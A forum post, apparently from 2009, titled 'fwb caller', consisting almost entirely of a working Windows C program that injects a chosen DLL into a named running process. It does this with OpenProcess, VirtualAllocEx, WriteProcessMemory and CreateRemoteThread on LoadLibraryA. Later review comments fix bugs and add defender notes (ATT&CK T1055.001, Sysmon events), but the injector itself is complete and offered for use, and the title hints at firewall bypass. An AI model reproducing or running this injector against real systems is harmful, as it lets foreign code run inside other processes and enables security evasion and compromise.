fwb caller


fwb caller

Post  ~Fleck on Sun Jun 28, 2009 10:50 am

call fwb
Code:

#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <stdio.h>
#include <string.h>

/* Link shlwapi.lib; getPIDByName() calls StrStrI from it. */
#pragma comment(lib, "shlwapi.lib")

/* Size (without terminator) of the path buffer that main() fills via GetFullPathName. */
#define MAX_BUF_SIZE 1024
/* NOTE(review): defined after <windows.h> has already been included above,
 * so it has no effect on that include. */
#define WIN32_LEAN_AND_MEAN
/* Access mask covering thread creation plus VM read/write/operation rights.
 * Not referenced in the code shown; injectDLL() requests PROCESS_ALL_ACCESS.
 * For defenders: these are the rights that remote-thread DLL loading depends
 * on, so process-access monitoring should look at the individual rights and
 * not only at a full-access mask. */
#define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)

/* Loads the DLL at path pDLLName into the process with ID pPID; negative on failure. */
int injectDLL(DWORD pPID, char *pDLLName);
/* Looks up a process ID by a case-insensitive substring of the image name. */
DWORD getPIDByName(char *lProcessName);

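/*
 * Entry point. Resolves the target process from a (partial) image name,
 * expands the DLL argument to a full path and hands both to injectDLL().
 *
 * argv[1]  process image name (substring match, see getPIDByName())
 * argv[2]  DLL path, absolute or relative to the current directory
 *
 * Exit code: 0 on success, -1 bad usage, -2 injectDLL() reported failure,
 *            -3 no matching process, -4 DLL path could not be resolved.
 *
 * The original always returned 0 and called injectDLL() even when the
 * process lookup failed (PID 0); both are corrected here.
 */
int main(int argc, char * argv[])
{
  int lRetVal = 0;
  DWORD lPID = 0;
  DWORD lPathLen = 0;
  char lTemp[MAX_BUF_SIZE + 1];

  if (argc <= 2)
  {
    /* The first argument is a process name, not a numeric ID. */
    printf("Usage : %s process-name DLL-name\n", argv[0]);
    lRetVal = -1;
    goto END;
  }

  /* getPIDByName() yields 0 for "not found" and (DWORD)-1 when the snapshot
   * could not be taken; neither is a usable target. */
  lPID = getPIDByName(argv[1]);
  if (lPID == 0 || lPID == (DWORD) -1)
  {
    printf("No running process matches \"%s\".\n", argv[1]);
    lRetVal = -3;
    goto END;
  }

  /* Resolve the DLL path here so the path passed on does not depend on the
   * current directory. A return of 0 means failure; a value that does not
   * fit the buffer means the path was not copied. */
  ZeroMemory(lTemp, sizeof(lTemp));
  lPathLen = GetFullPathName(argv[2], sizeof(lTemp) - 1, lTemp, NULL);
  if (lPathLen == 0 || lPathLen >= sizeof(lTemp) - 1)
  {
    printf("Unable to resolve path \"%s\". Error no %lu\n", argv[2], (unsigned long) GetLastError());
    lRetVal = -4;
    goto END;
  }

  if (injectDLL(lPID, lTemp) < 0)
  {
    /* NOTE(review): injectDLL() calls CloseHandle() before returning, so the
     * error code printed here may not be the one from the failing call. */
    printf("Unable to load DLL \"%s\". Error no %lu\n", argv[2], (unsigned long) GetLastError());
    lRetVal = -2;
    goto END;
  }

  /* NOTE(review): injectDLL() returns 0 without checking its last two API
   * calls, so this message does not prove the module was loaded. */
  printf("DLL loaded and injected.");

END:

  return(lRetVal);
}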



/*
 * Makes the process identified by pPID load the DLL at path pDLLName.
 *
 * Steps visible below: open the target with PROCESS_ALL_ACCESS, look up
 * LoadLibraryA in this process's own Kernel32.dll, allocate read/write
 * memory in the target, copy the path string there, and start a thread in
 * the target whose start routine is LoadLibraryA and whose argument is the
 * copied path.
 *
 * Returns 0, or -1 (OpenProcess failed), -2 (LoadLibraryA not resolved),
 * -3 (remote allocation failed).
 *
 * NOTE(review): the results of WriteProcessMemory and CreateRemoteThread are
 * not checked, so a return of 0 does not confirm the module was loaded. The
 * thread handle returned by CreateRemoteThread is not closed and the remote
 * allocation is not released.
 *
 * Defender's view: this is the classic remote-thread DLL loading pattern
 * (MITRE ATT&CK T1055.001). It is observable as a cross-process handle open
 * with write/thread-creation rights (e.g. Sysmon Event ID 10), a remote
 * thread creation (Sysmon Event ID 8) and an unexpected image load in the
 * target (Sysmon Event ID 7). Protected-process and code-signing mitigation
 * policies on the target limit it.
 */
int injectDLL(DWORD pPID, char *pDLLName)
{
  int lRetVal = 0;
  HANDLE lProc;
  LPVOID lRemoteMemory = NULL;
  LPVOID lLoadLibraryPtr = NULL;

  /* Full-access handle to the target; fails with NULL if access is denied. */
  if(! (lProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pPID)))
  {
    printf("OpenProcess() failed: %d\n", GetLastError());
    lRetVal = -1;
    goto END;
  }
 
  /* Address is taken from the calling process; the code assumes the same
   * address is valid in the target. */
  if (!(lLoadLibraryPtr = (LPVOID) GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA")))
  {
    printf("Unable to load \"LoadLibraryA@Kernel32.dll\": %d", GetLastError());
    lRetVal = -2;
    goto END;   
  }
  /* Reserve and commit strlen(pDLLName) bytes of read/write memory in the target. */
  if ( !(lRemoteMemory = (LPVOID) VirtualAllocEx(lProc, NULL, strlen(pDLLName), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)))
  {
    printf("Unable to load allocate memory: %d", GetLastError());
    lRetVal = -3;
    goto END;
  }
  /* Copy the path into the target, then start a thread there that calls
   * LoadLibraryA on it. Neither return value is inspected. */
  WriteProcessMemory(lProc, (LPVOID) lRemoteMemory, pDLLName, strlen(pDLLName), NULL);
  CreateRemoteThread(lProc, NULL, NULL, (LPTHREAD_START_ROUTINE) lLoadLibraryPtr, (LPVOID) lRemoteMemory, NULL, NULL);

END:
 
  /* NOTE(review): OpenProcess signals failure with NULL, not
   * INVALID_HANDLE_VALUE, so on the -1 path CloseHandle is still called
   * with a NULL handle. */
  if (lProc != INVALID_HANDLE_VALUE)
    CloseHandle(lProc);

  return(lRetVal);
}
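/*
 * Returns the ID of the first process in a Toolhelp snapshot whose image
 * name contains lProcessName (case-insensitive substring match).
 *
 * Returns 0 when nothing matches or the name is NULL/empty, and (DWORD)-1
 * when the snapshot cannot be created (same values as before).
 *
 * NOTE(review): the match is a substring match on the first hit, so a short
 * name can select a different process than the caller intended; callers
 * that act on the result should pass the full image name.
 *
 * The snapshot handle is now closed before returning; the original leaked it.
 */
DWORD getPIDByName(char *lProcessName)
{
  PROCESSENTRY32 lEntry;
  HANDLE lSnapshot;
  DWORD lRetVal = 0;

  /* Nothing to search for. */
  if (lProcessName == NULL || *lProcessName == '\0')
  {
    return 0;
  }

  lSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if (lSnapshot == INVALID_HANDLE_VALUE)
  {
    printf("Error: Unable to create toolhelp snapshot!");
    return (DWORD) -1;
  }

  /* dwSize must be set before the first Process32First call. */
  ZeroMemory(&lEntry, sizeof(lEntry));
  lEntry.dwSize = sizeof(PROCESSENTRY32);

  if (Process32First(lSnapshot, &lEntry))
  {
    do
    {
      if (StrStrI(lEntry.szExeFile, lProcessName))
      {
        lRetVal = lEntry.th32ProcessID;
        break;
      }
    } while (Process32Next(lSnapshot, &lEntry));
  }

  CloseHandle(lSnapshot);

  return lRetVal;
}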
